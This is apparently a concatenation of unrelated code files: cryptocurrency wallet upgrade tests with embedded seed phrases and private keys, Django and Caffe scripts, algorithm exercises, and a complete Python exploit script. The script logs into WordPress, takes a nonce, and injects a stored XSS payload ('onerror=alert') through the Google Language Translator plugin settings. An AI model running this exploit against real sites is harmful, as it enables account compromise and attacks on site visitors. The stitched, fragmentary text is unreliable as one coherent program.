wallet_str = '{"addr_history": {"M86vvgYRgPBW3QfyUnxbKBeUzbGtgp6NXG": [],"M98MvBtibhTcnz8tLPNk3ooFDE5qpck83r": [],"M9caHU9o66Wvmc2gqqW2DHPcnshqdj36kG": [],"MABcFFZv7v3FRAEKU5kqoB6xt9VKupEt8K": [],"MAeRNwBYorbvbeAwiJfp7cEiPHThPhcut2": [],"MBMpHGd7nKhFn7SPYkNb2SJd8WiGpTH5aB": [],"MBavRPSte8woScUxXQwybiwvvWNpEZ1WWy": [],"MC9S8ipqNu4pjodYA7ns6sS15GEEUqeuU3": [],"MEhUENYZXhwuKtiCYep6AjpRGqLBLLxa4y": [],"MFbXqsdyVSnEGmGMpduND5kp93ExhYgtbu": [],"MFgJcgrbEnV1ANbPcAsAV7ADBF63NEpXK3": [],"MGUJMzZeA1PBUsv3rUNcjLzVnAjaWkS95n": [],"MGtCxT8kLcqqi66Spwr98JnYSYJHU7ShGZ": [],"MGwggCpjuwpCfbjTCbYoX1ngzNSUnTEtEn": [],"MLoyw8Bt5zVoVRcFxUPbKuW5FF3NNfLUVf": [],"MLy8usGiKXVqo4VtWAUq1jdgKASdN8JTij": [],"MPMNgAeu7B6PTr9WVM9mhRycmQVy14VUvL": [],"MPQzvFN6fvcdwZC1KsrjagZizdFx46yp1V": [],"MPbw4Njqk6neGMcBNmxHpDjxoBGbMPwJiL": [],"MQycguJjCxpW7qBGKHPptGqMVUP28VJhp6": [],"MRR8gRePoj33M9Sx4UDEAC1fdLhppit71k": [],"MSJTC3sSuVSyQ2Fehrxg5UkwpYQn2bkNjC": [],"MSeTEqGyJfAD6TxsFgfGwMtvWf3fbaRZeW": [],"MSi7o6WRptrcpQEZBvVX2rrZdKz5WHcXyJ": [],"MSjeTpS3Kcij8GvCnatG17mPdFd3FfF3Ra": [],"MTVWS92xnBVqopgTo3F7eYqQq24b3EQpNB": [],"MUuGCeLx98GQxq1Y2UTSQbZd7PMmc2iDAs": [],"MWfHXccPyKPeY5Nf5kSk4GsCKHhsBSymxU": []},"addresses": {"change": ["MPbw4Njqk6neGMcBNmxHpDjxoBGbMPwJiL","MPMNgAeu7B6PTr9WVM9mhRycmQVy14VUvL","MC9S8ipqNu4pjodYA7ns6sS15GEEUqeuU3","MGwggCpjuwpCfbjTCbYoX1ngzNSUnTEtEn","MGtCxT8kLcqqi66Spwr98JnYSYJHU7ShGZ","MRR8gRePoj33M9Sx4UDEAC1fdLhppit71k"],"receiving": 
["MBavRPSte8woScUxXQwybiwvvWNpEZ1WWy","MABcFFZv7v3FRAEKU5kqoB6xt9VKupEt8K","MGUJMzZeA1PBUsv3rUNcjLzVnAjaWkS95n","MQycguJjCxpW7qBGKHPptGqMVUP28VJhp6","MWfHXccPyKPeY5Nf5kSk4GsCKHhsBSymxU","MAeRNwBYorbvbeAwiJfp7cEiPHThPhcut2","MSJTC3sSuVSyQ2Fehrxg5UkwpYQn2bkNjC","M98MvBtibhTcnz8tLPNk3ooFDE5qpck83r","M9caHU9o66Wvmc2gqqW2DHPcnshqdj36kG","MBMpHGd7nKhFn7SPYkNb2SJd8WiGpTH5aB","MSjeTpS3Kcij8GvCnatG17mPdFd3FfF3Ra","MEhUENYZXhwuKtiCYep6AjpRGqLBLLxa4y","MLy8usGiKXVqo4VtWAUq1jdgKASdN8JTij","MFbXqsdyVSnEGmGMpduND5kp93ExhYgtbu","MSi7o6WRptrcpQEZBvVX2rrZdKz5WHcXyJ","MFgJcgrbEnV1ANbPcAsAV7ADBF63NEpXK3","M86vvgYRgPBW3QfyUnxbKBeUzbGtgp6NXG","MLoyw8Bt5zVoVRcFxUPbKuW5FF3NNfLUVf","MPQzvFN6fvcdwZC1KsrjagZizdFx46yp1V","MUuGCeLx98GQxq1Y2UTSQbZd7PMmc2iDAs","MTVWS92xnBVqopgTo3F7eYqQq24b3EQpNB","MSeTEqGyJfAD6TxsFgfGwMtvWf3fbaRZeW"]},"keystore": {"seed": "cereal wise two govern top pet frog nut rule sketch bundle logic","type": "bip32","xprv": "xprv9s21ZrQH143K29XjRjUs6MnDB9wXjXbJP2kG1fnRk8zjdDYWqVkQYUqaDtgZp5zPSrH5PZQJs8sU25HrUgT1WdgsPU8GbifKurtMYg37d4v","xpub": "xpub661MyMwAqRbcEdcCXm1sTViwjBn28zK9kFfrp4C3JUXiW1sfP34f6HA45B9yr7EH5XGzWuTfMTdqpt9XPrVQVUdgiYb5NW9m8ij1FSZgGBF"},"pruned_txo": {},"seed_type": "standard","seed_version": 14,"stored_height": 1298303,"transactions": {},"tx_fees": {},"txi": {},"txo": {},"use_encryption": false,"verified_tx3": {},"wallet_type": "standard","winpos-qt": [100,100,840,400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_importedkeys(self):
wallet_str = '{"addr_history": {"MJNDhNyzYPbcFE5uZAg2j6YyUQVdLDhuP3": []}, "addresses": {"change": [], "receiving": ["MJNDhNyzYPbcFE5uZAg2j6YyUQVdLDhuP3"]}, "keystore": {"keypairs": {"03c2725dae5de0cbf0101cf57a3aadfb301bc3b432fa8ea38515198e41df12199f": "TPxZYPTaBiwFVo5kVmBYuJctGVDMRaCLNEEu8nsxLednda1zmVGS"}, "type": "imported"}, "pruned_txo": {}, "seed_version": 13, "stored_height": 1244824, "transactions": {}, "tx_fees": {}, "txi": {}, "txo": {}, "use_encryption": false, "verified_tx3": {}, "wallet_type": "standard", "winpos-qt": [314, 230, 840, 400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_watchaddresses(self):
wallet_str = '{"addr_history": {"MFMy9FwJsV6HiN5eZDqDETw4pw52q3UGrb": []}, "addresses": ["MFMy9FwJsV6HiN5eZDqDETw4pw52q3UGrb"], "pruned_txo": {}, "seed_version": 13, "stored_height": 1244820, "transactions": {}, "tx_fees": {}, "txi": {}, "txo": {}, "verified_tx3": {}, "wallet_type": "imported", "winpos-qt": [100, 100, 840, 400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_multisig(self):
wallet_str = '{"addr_history": {"P8ot4kcLZQaFfEV7RjVktxi7GQ1LUgDV1F": [],"P9HLyBSBSSy3JZ6cQYG6UkCiQoB6ZsPZ6Z": [],"PA9ZadzWaMXEEEBfmJy3ekhnpm3BU7mQyE": [],"PAFZUHzrhi8a3yfu9StTo7i1fy7xhc5GMp": [],"PAq4wHvvJsKLeFvRKtGA19Dj5gywwju5V2": [],"PCnkbJvEgHwmy6Lx6bvVYxUSziUpdmgx4i": [],"PDtrWfnff4DBcxGyBB1fnMpg7gv1XrYZsQ": [],"PEkj8tn89LfdKCr3AqC56BrXFKeoc1a3vP": [],"PF4BYeRwvnb8T6PXVfEw6zcVBEuujUqHCy": [],"PFAiWWB7TMVWyYmUPjE3489MhSSvTpFk1p": [],"PH94CH7MDa5tRkAkzGRwrMPuFhvTL5nsRL": [],"PHUSkFkwWP9hsMtjiBzkLyhP7NgEh3RjhA": [],"PL4NEabh2Q7yZEhY7TFSyq7JQEZ7zr65X2": [],"PPDDRcW6SvwcY68HBHPnFgQ1FmaRxCTWBf": [],"PPuJCCfP24gyUkLH8bVG4WJoFuw1Vktk47": [],"PQbo5pSf85CNH65W8zfXx1jVbvpkXFAH4q": [],"PRbupBpgfzRjoRGNqxERvzavJxRYPiDhfL": [],"PRnKJNuZpXDzJkWVTczMKUcQabWJVQX251": [],"PSJy76AemtebcepCwbsxnKoKVBwt94UbWD": [],"PSRoFQvkAmBqt151uNxH4ZB15NWVYC6JNQ": [],"PSTsTodTzJoHsHtUhCYoK5Lpu6TXHQ5Udm": [],"PSYcYiD1FaXpJAjFYkwN5opsrLMhQdphfz": [],"PSyjnkncpTntycMfaQTjdA7dDYWExKsnGD": [],"PT4Z5AjuZDCFXpFiDh8dcqujuGygadMkCd": [],"PVwTXpiNsH5gmaxHyCFinvXtByxhM3hSoF": [],"PWaXrnSr5QbnfYiwC6n1Tww8vs3BTUKRC6": [],"PWfGT1PQ5EXmrhjqJVeE4HUZcvNfhiRj9P": []},"addresses": {"change": ["P8ot4kcLZQaFfEV7RjVktxi7GQ1LUgDV1F","PRbupBpgfzRjoRGNqxERvzavJxRYPiDhfL","PPDDRcW6SvwcY68HBHPnFgQ1FmaRxCTWBf","PT4Z5AjuZDCFXpFiDh8dcqujuGygadMkCd","PAFZUHzrhi8a3yfu9StTo7i1fy7xhc5GMp","PH94CH7MDa5tRkAkzGRwrMPuFhvTL5nsRL"],"receiving": 
["PVwTXpiNsH5gmaxHyCFinvXtByxhM3hSoF","PA9ZadzWaMXEEEBfmJy3ekhnpm3BU7mQyE","PL4NEabh2Q7yZEhY7TFSyq7JQEZ7zr65X2","PHUSkFkwWP9hsMtjiBzkLyhP7NgEh3RjhA","PPuJCCfP24gyUkLH8bVG4WJoFuw1Vktk47","PDtrWfnff4DBcxGyBB1fnMpg7gv1XrYZsQ","PEkj8tn89LfdKCr3AqC56BrXFKeoc1a3vP","PF4BYeRwvnb8T6PXVfEw6zcVBEuujUqHCy","PFAiWWB7TMVWyYmUPjE3489MhSSvTpFk1p","PAq4wHvvJsKLeFvRKtGA19Dj5gywwju5V2","PSyjnkncpTntycMfaQTjdA7dDYWExKsnGD","PSRoFQvkAmBqt151uNxH4ZB15NWVYC6JNQ","PSJy76AemtebcepCwbsxnKoKVBwt94UbWD","PSTsTodTzJoHsHtUhCYoK5Lpu6TXHQ5Udm","P9HLyBSBSSy3JZ6cQYG6UkCiQoB6ZsPZ6Z","PSYcYiD1FaXpJAjFYkwN5opsrLMhQdphfz","PRnKJNuZpXDzJkWVTczMKUcQabWJVQX251","PWaXrnSr5QbnfYiwC6n1Tww8vs3BTUKRC6","PWfGT1PQ5EXmrhjqJVeE4HUZcvNfhiRj9P","PCnkbJvEgHwmy6Lx6bvVYxUSziUpdmgx4i","PQbo5pSf85CNH65W8zfXx1jVbvpkXFAH4q"]},"pruned_txo": {},"seed_version": 14,"stored_height": 1479743,"transactions": {},"tx_fees": {},"txi": {},"txo": {},"use_encryption": false,"verified_tx3": {},"wallet_type": "2of2","winpos-qt": [100,100,840,400],"x1/": {"seed": "speed cruise market wasp ability alarm hold essay grass coconut tissue recipe","type": "bip32","xprv": "xprv9s21ZrQH143K48ig2wcAuZoEKaYdNRaShKFR3hLrgwsNW13QYRhXH6gAG1khxim6dw2RtAzF8RWbQxr1vvWUJFfEu2SJZhYbv6pfreMpuLB","xpub": "xpub661MyMwAqRbcGco98y9BGhjxscP7mtJJ4YB1r5kUFHQMNoNZ5y1mptze7J37JypkbrmBdnqTvSNzxL7cE1FrHg16qoj9S12MUpiYxVbTKQV"},"x2/": {"type": "bip32","xprv": null,"xpub": "xpub661MyMwAqRbcGrCDZaVs9VC7Z6579tsGvpqyDYZEHKg2MXoDkxhrWoukqvwDPXKdxVkYA6Hv9XHLETptfZfNpcJZmsUThdXXkTNGoBjQv1o"}}'
self._upgrade_storage(wallet_str)
##########
plugins: 'electrum_mona.plugin.Plugins'
@classmethod
def setUpClass(cls):
super().setUpClass()
from electrum_mona.plugin import Plugins
from electrum_mona.simple_config import SimpleConfig
cls.__electrum_path = tempfile.mkdtemp()
config = SimpleConfig({'electrum_path': cls.__electrum_path})
gui_name = 'cmdline'
# TODO it's probably wasteful to load all plugins... only need Trezor
cls.plugins = Plugins(config, gui_name)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.__electrum_path)
cls.plugins.stop()
cls.plugins.stopped_event.wait()
    def _upgrade_storage(self, wallet_json, accounts=1) -> Optional[WalletDB]:
        """Run a legacy wallet JSON through both the manual and automatic
        upgrade paths and sanity-check the result.

        For multi-account wallets (accounts > 1) the DB must first be split
        into per-account DBs, each of which is upgraded and checked; in that
        case None is returned.
        """
        if accounts == 1:
            # test manual upgrades
            db = self._load_db_from_json_string(wallet_json=wallet_json,
                                                manual_upgrades=True)
            self.assertFalse(db.requires_split())
            if db.requires_upgrade():
                db.upgrade()
                self._sanity_check_upgraded_db(db)
            # test automatic upgrades
            db2 = self._load_db_from_json_string(wallet_json=wallet_json,
                                                 manual_upgrades=False)
            self._sanity_check_upgraded_db(db2)
            return db2
        else:
            db = self._load_db_from_json_string(wallet_json=wallet_json,
                                                manual_upgrades=True)
            self.assertTrue(db.requires_split())
            split_data = db.get_split_accounts()
            self.assertEqual(accounts, len(split_data))
            # each split account becomes its own DB, upgraded automatically
            for item in split_data:
                data = json.dumps(item)
                new_db = WalletDB(data, manual_upgrades=False)
                self._sanity_check_upgraded_db(new_db)
    def _sanity_check_upgraded_db(self, db):
        """Assert the DB is fully upgraded and can actually back a Wallet."""
        self.assertFalse(db.requires_split())
        self.assertFalse(db.requires_upgrade())
        # Constructing the wallet exercises the upgraded schema end-to-end;
        # stop() runs on the test's event loop so background tasks shut down.
        wallet = Wallet(db, None, config=self.config)
        asyncio.run_coroutine_threadsafe(wallet.stop(), self.asyncio_loop).result()
    @staticmethod
    def _load_db_from_json_string(*, wallet_json, manual_upgrades):
        """Parse a raw wallet-JSON string into a WalletDB."""
        db = WalletDB(wallet_json, manual_upgrades=manual_upgrades)
        return db
|
15,956 | 21734c02e6899f155c815b6aa64a5596c8fa6472 | import io
from django.conf import settings
from django.core.management import BaseCommand
from buyer.models import Buyer
from core.helpers import generate_csv, upload_file_object_to_s3
class Command(BaseCommand):
    help = 'Generate the FAB buyers CSV dump and uploads it to S3.'

    def handle(self, *args, **options):
        """Entry point: build the CSV in memory, then upload it to the
        data-science S3 bucket under the configured key."""
        file_object = self.generate_csv_file()
        key = settings.BUYERS_CSV_FILE_NAME
        upload_file_object_to_s3(
            file_object=file_object,
            key=key,
            bucket=settings.AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE,
        )
        self.stdout.write(self.style.SUCCESS('All done, bye!'))

    @staticmethod
    def generate_csv_file():
        """Serialize all Buyer rows into an in-memory CSV (StringIO).

        The related-name field is excluded so the reverse relation is not
        dumped into the CSV.
        """
        csv_excluded_fields = ('buyeremailnotification',)
        file_object = io.StringIO()
        generate_csv(file_object=file_object, queryset=Buyer.objects.all(), excluded_fields=csv_excluded_fields)
        return file_object
|
15,957 | 064b6130bc10227ea8349d7a04279b9067a573b4 | from django.apps import AppConfig
class WebDemoConfig(AppConfig):
    """Django application configuration for the ``web_demo`` app."""
    # Dotted module path Django uses to register this application.
    name = 'web_demo'
|
15,958 | 288e8b579bee64ca61b95edbefb04a45c4d2afaa | # 78.子集(Medium)
# 题目描述:
# 给定一组不含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集)。
# 说明:解集不能包含重复的子集,[1, 2] 和 [2, 1] 这种子集算重复
# 示例:
# 输入: nums = [1,2,3]
# 输出:
# [[3],
# [1],
# [2],
# [1,2,3],
# [1,3],
# [2,3],
# [1,2],
# []]
class Solution(object):
    def subsets(self, nums):
        """
        Return the power set of `nums` (no duplicate elements assumed).
        :type nums: List[int]
        :rtype: List[List[int]]
        """
        if len(nums) == 0:
            return [[]]
        res = []

        def _collect(start, path):
            # every prefix reached so far is itself a valid subset
            res.append(list(path))
            for idx in range(start, len(nums)):
                path.append(nums[idx])
                _collect(idx + 1, path)
                path.pop()

        _collect(0, [])
        return res
if __name__ == '__main__':
nums = [1,2,3]
sl = Solution()
res = sl.subsets(nums)
print(res)
|
15,959 | 4420fcf7dff3fdf0c1851d4bb5e8db0d704abc06 | '''
创建集合使用 {} 或 set() ,但是如果要创建空集合只能使用set(),因为{} 用来创建空字典
'''
s1 = {10, 20, 40, 50}
# add(): insert a single element; adding an existing element is a no-op
# s1.add(100)
# s1.add(10)
# print(s1)
# update(): the data to add must be a sequence (list, tuple, string, ...)
# s1.update([10, 20, 30, 40])
# print(s1)
# remove(): delete the given element; raises KeyError if it is absent
# s1.remove(10)
# discard(): delete the given element; silently ignores a missing element
# s1.discard(20)
# pop(): remove and return an arbitrary element
# del_num = s1.pop()
# print(s1)
# print(del_num)
# Membership tests
# in: element is present in the set
# not in: element is absent from the set
|
15,960 | 12277b4e22f9a5f0f6a9cbbd2026ca2a4d6ca047 | __author__ = 'Esmidth'
class stepper:
    """Indexable wrapper around a `data` attribute.

    Defining __getitem__ also makes instances iterable and gives them
    `in` membership tests for free.
    """

    def __getitem__(self, index):
        return self.data[index]
x = stepper()
x.data = 'Spam'
print(x[1])
for item in x:
print(item)
print('a' in x) |
15,961 | 79176269d65c1f0a9ae74e49e6ba090849a0728a | import msgpack
from nanomsg import (
PUB,
SUB,
SUB_SUBSCRIBE,
PAIR,
DONTWAIT,
Socket,
NanoMsgAPIError,
EAGAIN
)
class Channel(object):
    """Thin msgpack-over-nanomsg messaging channel.

    Supports publish/subscribe ('Pub'/'Sub') and bidirectional 'Pair'
    sockets; the server side binds the address, clients connect to it.
    """

    type_map = {
        'Sub': SUB,
        'Pub': PUB,
        'Pair': PAIR
    }

    def __init__(self, address, channel_type, is_server):
        self.__socket = Socket(self.type_map[channel_type])
        if is_server:
            self.__socket.bind(address)
        else:
            self.__socket.connect(address)
        if channel_type == 'Sub':
            # empty subscription prefix = receive every published message
            self.__socket.set_string_option(SUB, SUB_SUBSCRIBE, '')

    def recv(self, blocking=True):
        """Receive one message and msgpack-decode it.

        With blocking=False, returns None immediately when no message is
        pending (EAGAIN); any other socket error propagates to the caller.
        """
        if blocking:
            result = self.__socket.recv()
        else:
            try:
                result = self.__socket.recv(flags=DONTWAIT)
            except NanoMsgAPIError as error:
                if error.errno == EAGAIN:
                    return None
                # BUG FIX: previously any non-EAGAIN error fell through to
                # unpackb() with `result` unbound, raising a confusing
                # NameError; re-raise the real socket error instead.
                raise
        return msgpack.unpackb(result)

    def send(self, msg):
        """msgpack-encode `msg` and send it on the socket."""
        return self.__socket.send(msgpack.packb(msg))
|
15,962 | 64d87fec80e32d04c21cf281d7f36ee5a080f7bf | #!/usr/bin/env python3 -B
import unittest
from cromulent import vocab
from tests import TestKnoedlerPipelineOutput, classified_identifiers
vocab.add_attribute_assignment_check()
class PIRModelingTest_AR38(TestKnoedlerPipelineOutput):
    '''
    AR-38: Knoedler stock numbers not correctly identified on physical object model
    '''
    def test_modeling_ar38(self):
        """Regression test: object 2391 must carry both its stock number
        and its title as classified identifiers."""
        output = self.run_pipeline('ar38')
        objects = output['model-object']
        # fixed URI of the physical object produced by the 'ar38' fixture
        obj = objects['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:knoedler#Object,2391']
        self.assertEqual(classified_identifiers(obj), {
            'Stock Number': '2391',
            'Title': 'Head of young girl',
        })
if __name__ == '__main__':
unittest.main()
|
15,963 | 067337f07f9d652a02891205fd175a4901a5a2c9 | # Given an m x n matrix board containing 'X' and 'O', capture all regions that are 4-directionally surrounded by 'X'.
# A region is captured by flipping all 'O's into 'X's in that surrounded region.
#
# Example 1:
#
# Input: board = [["X","X","X","X"],["X","O","O","X"],["X","X","O","X"],["X","O","X","X"]]
# Output: [["X","X","X","X"],["X","X","X","X"],["X","X","X","X"],["X","O","X","X"]]
# Explanation: Surrounded regions should not be on the border, which means that any 'O' on the border of the board are not flipped to 'X'. Any 'O' that is not on the border and it is not connected to an 'O' on the border will be flipped to 'X'. Two cells are connected if they are adjacent cells connected horizontally or vertically.
#
# Example 2:
#
# Input: board = [["X"]]
# Output: [["X"]]
#
# Constraints:
#
# m == board.length
# n == board[i].length
# 1 <= m, n <= 200
# board[i][j] is 'X' or 'O'.
"""
Do not return anything, modify board in-place instead.
"""
# DFS
#
# Idea
# 1) Check four borders. If it is O, change it and all its neighbor to temporary #
# 2) Change all O to X
# 3) Change all # to O
#
# Example
# X X X X X X X X X X X X
# X X O X -> X X O X -> X X X X
# X O X X X # X X X O X X
# X O X X X # X X X O X X
class Solution:
    # BUG FIX: `List` was used in annotations but never imported, which makes
    # the class definition itself raise NameError. The annotation is kept as a
    # string (lazy) so the documented type survives without the import.
    def solve(self, board: "List[List[str]]") -> None:
        """Capture all 'O' regions fully surrounded by 'X', in place.

        Any 'O' reachable from the border stays 'O'; every other 'O'
        is flipped to 'X'. Returns None (board is modified in place).
        """
        if not board:
            return
        m, n = len(board), len(board[0])
        dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]

        def go(sx, sy):
            # Iterative flood fill marking border-connected 'O' cells as '#'.
            # (An explicit stack avoids RecursionError: m,n can be up to 200,
            # so a recursive DFS could need ~40k frames.)
            stack = [(sx, sy)]
            while stack:
                x, y = stack.pop()
                if 0 <= x < m and 0 <= y < n and board[x][y] == "O":
                    board[x][y] = "#"
                    for dx, dy in dirs:
                        stack.append((x + dx, y + dy))

        # Protect every region touching the left/right borders
        for i in range(m):
            go(i, 0)
            go(i, n - 1)
        # Protect every region touching the top/bottom borders
        for j in range(n):
            go(0, j)
            go(m - 1, j)
        for i in range(m):
            for j in range(n):
                # Remaining 'O's are surrounded: capture them
                if board[i][j] == "O":
                    board[i][j] = "X"
                # Restore protected cells
                if board[i][j] == "#":
                    board[i][j] = "O"
|
15,964 | e5181e4bca3367d66726d37d007a4712649cab98 | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
x=100
n=2
def raiz(x, n):
    """Return the n-th root of x, computed as x ** (1/n)."""
    exponent = 1 / float(n)
    return x ** exponent
print(raiz(x,n)) |
15,965 | f39931f5bc2fdea0107199f14db4e38227979514 | #/usr/bin/env python3
import requests
import re
import sys
from termcolor import colored
(banner) = """
__ __ _
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Authenticated Stored XSS - Translate WordPress – Google Language Translator
by https://github.com/apapedulimu
"""
print(colored(banner, 'green'))
print(colored("usage : \n======= \npython3 exploit.py http://<IP>:<PORT>/ <Username> <Password>\n",'red'))
payload = "<h1>Hacked By Hacker</h1><img src=x onerror=alert(document.domain)>"
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
data = {
'log':username,
'pwd':password,
'wp-submit':'Log In',
'redirect_to':url+'wp-admin/',
'testcookie':1
}
r = requests.post(url+'wp-login.php',data=data)
if r.status_code == 200:
print("[+] Login successful.")
else:
print("[-] Failed to login.")
exit(0)
cookies = r.cookies
print("[+] Check Installed Plugin ")
res = requests.get(url+'wp-admin/options-general.php?page=google_language_translator',cookies=cookies)
# BUG FIX: the original tested `r.status_code` — the *login* response from
# earlier — so this check could never reflect the plugin-page request.
if res.status_code == 200:
    print("[+] Plugin Installed.")
else:
    print("[-] Plugin not installed on the website.")
    exit(0)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce \n")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully !\n[+] _wpnonce : " + wp_nonce)
data = {
'option_page':'google_language_translator',
'_wpnonce': wp_nonce,
'action':'update',
'googlelanguagetranslator_active':'1',
'googlelanguagetranslator_floating_widget':'yes',
'googlelanguagetranslator_floating_widget_text': payload
}
res = requests.post(url+'wp-admin/options.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] Exploit Success.\n[+] Open "+url+"wp-admin/options-general.php?page=google_language_translator")
else:
print("[-] Exploit Failed.")
exit(0)
|
15,966 | 04e896e7d4d04e37baf3281788f4b1ed5743049d | from database import Base
from sqlalchemy import Column, Integer, String, SmallInteger, ForeignKey, Float
from sqlalchemy import DateTime, func
from datetime import datetime
from sqlalchemy.orm import relationship
from models.users import User
class Transaction(Base):
    """SQLAlchemy model for a purchase transaction.

    Linked to an optional User via `user_id`; `status` is a small-int code
    (semantics defined by the application layer — TODO confirm mapping).
    """
    __tablename__ = "transactions"

    id = Column(Integer, primary_key=True)
    # creation timestamp defaults to UTC now when not supplied by the ORM
    date_created = Column(DateTime, nullable=False, default=datetime.utcnow)
    date_processed = Column(DateTime, nullable=False)
    status = Column(SmallInteger, nullable=False)
    total_price = Column(Float, nullable=False)
    total_tiles = Column(Integer, nullable=False)
    user_id = Column(Integer, ForeignKey('users.id'), nullable=True)
    user = relationship("User", backref="transactions")

    def __init__(self, date_created, date_processed, status, total_price, total_tiles, user_id):
        """Explicit constructor mirroring the column set; note that passing
        date_created here bypasses the column default."""
        self.date_created = date_created
        self.date_processed = date_processed
        self.status = status
        self.total_price = total_price
        self.total_tiles = total_tiles
        self.user_id = user_id

    def __repr__(self):
        return """<Transaction(date_created'{0}', date_processed'{1}', status'{2}', total_price'{3}',
                total_tiles'{4}', user_id'{5}'>""".format(
            self.date_created, self.date_processed, self.status, self.total_price, self.total_tiles,
            self.user_id)
|
15,967 | 9a8f977a732ddca744a53e4cd488110d1ca1087d | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 26 19:32:24 2017
@author: xu.2727
using my pre-trained net to extract features
"""
import caffe
import numpy as np
import os
import scipy.io as sio
from random import shuffle
from PIL import Image
import pdb
class_map = {
(255,255,255):0,
(0,0,255):1,
(0,255,255):2,
(0,255,0):3,
(255,255,0):4,
(255,0,0):5
}
name_map = {
0:'surface',
1:'Building',
2:'low vegetation',
3:'Tree',
4:'Car',
5:'Background'
}
kernel_size = 224
mask_path = r'' #path to mask image
image_path = r'' #path to image
mat_root = r'' #path to height information
file_path = r""
output_root = r"" #path to store the extracted features
batch = 10 #batch size
featureLen = 512 # feature dim
img_list = [1, 3, 5, 7, 11, 13, 15, 17, 21, 23, 26, 28, 30, 32, 34, 37]
start_idx = 0
category_list = ["building", "surface", "vegetationTree"]
for c_idx in range(0, len(category_list)):
if(os.path.isdir(os.path.join(output_root, category_list[c_idx])) == False):
os.mkdir(os.path.join(output_root, category_list[c_idx]))
print(category_list[c_idx])
if c_idx == 0:
positive_class = [1]
if c_idx == 1:
positive_class = [0]
if c_idx == 2:
positive_class = [2,3]
folder_name = os.path.join('Mynetwork', category_list[c_idx])#!
caffe_model = ""#path to caffe model
define_file = ""#path to caffe deploy file
model_file = os.path.join(file_path, caffe_model)
prototxt_file = os.path.join(file_path, define_file)
caffe.set_mode_cpu()
net = caffe.Net(prototxt_file, model_file, caffe.TEST)
extract_layer = 'fc0' #extract features of FC0
for img_idx in range(start_idx, len(img_list)):
print(img_list[img_idx])
origin_name = 'top_mosaic_09cm_area' + str(img_list[img_idx]) + '.tif'
mask_name = 'top_mosaic_09cm_area' + str(img_list[img_idx]) + '.tif'
dsm_path = mat_root + '\\' + str(img_idx) + '_data.mat'
dsmfile = sio.loadmat(dsm_path)
dsm = dsmfile['result']
dsm = dsm * 255
mask = Image.open(os.path.join(mask_path, mask_name))#get label
origin = Image.open(os.path.join(image_path, origin_name))# get Data
origin = np.asarray(origin)
mask = np.asarray(mask)
img_height = mask.shape[0]
img_width = mask.shape[1]
patch_list = []
pos_count = 0
stride = 100
for i in range(kernel_size, img_height):
for j in range(kernel_size, img_width):
temp_class = class_map[tuple(mask[i - kernel_size / 2][j - kernel_size / 2])]
if temp_class in positive_class:
if pos_count % stride == 0:
patch_list.append(((i,j),temp_class))
pos_count += 1
training_sample = len(patch_list)
shuffle(patch_list)
rd = training_sample / batch
training_sample = rd * batch
mat_coordfile = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_coord.mat')#save coordination of each pixel
mat_classfile = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_class.mat')#save each pixel's corresponding class
coord = np.zeros((training_sample, 2))
classid = np.zeros((training_sample,1))
for idx, val in enumerate(patch_list):
if idx >= training_sample: break
coord[idx][0] = val[0][0]
coord[idx][1] = val[0][1]
classid[idx] = val[1]
sio.savemat(mat_coordfile, {'coord' : coord})
sio.savemat(mat_classfile, {'classid' : classid})
feature_file = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_featureMap.mat')
feature_map = np.ones((training_sample, featureLen))
for temp_rd in range(rd):
X_train = np.zeros((batch, 6, kernel_size, kernel_size), dtype = np.uint8)#input data
for j in range(batch):
idx = temp_rd * batch + j
x = patch_list[idx][0][0]
y = patch_list[idx][0][1]
X_copy = origin[x - kernel_size:x, y - kernel_size:y].copy()
X_copy = X_copy[:,:,::-1]
X_train[j][:3] = X_copy.transpose(2,0,1)
net.forward_all(data = X_train)
temp_data = net.blobs[extract_layer].data
temp_data.astype(float)
feature_map[temp_rd * batch : temp_rd * batch + batch] = temp_data
sio.savemat(feature_file, {'feature_map' : feature_map})
|
15,968 | 2b2ad73cfe1439a2d478024bc6a868c28cfa4dfe | #!/usr/bin/env python
#-*-coding:utf8-*-
import re
import requests
url = 'https://pt.sjtu.edu.cn/torrents.php?inclbookmarked=0&incldead=0&spstate=0&cat=429&page=0'
class spider:
    """Minimal crawler that downloads one fixed torrent-listing page.

    NOTE(review): Python 2 syntax (print statement); the module-level `url`
    is captured at construction time.
    """
    def __init__(self):
        self.url = url
        print "start crawling ..."
    def getContent(self):
        """Fetch the page and return the raw response body (bytes)."""
        response = requests.get(self.url)
        return response.content
    # def getEachLesson(self,):
if __name__=='__main__':
putaospider = spider()
print putaospider.getContent()
|
15,969 | fb361cf718c6ccf03cb12ce00cf52db48a1a1593 | from random import randint
# Number-guessing game: the player has 5 attempts to find a number in 1..50.
c = randint(1, 50)
for var in range(1, 6):
    u = int(input("Your guess : "))
    if u < c:
        print("Be Big Think Big")
    elif u > c:
        print("Be in limits and think lower")
    else:
        print("You have won the game ")
        break
else:
    # BUG FIX: the last line was a syntax error (unclosed paren, undefined
    # name `cq`). Using for/else also stops the "looser" message from
    # printing when the player wins on the 5th attempt.
    print("You such a looser : ")
    print("computer guess was : ", c)
15,970 | 05bfd69829a9adf6b0877ea98a2ee2c854eb23f3 | import feedparser
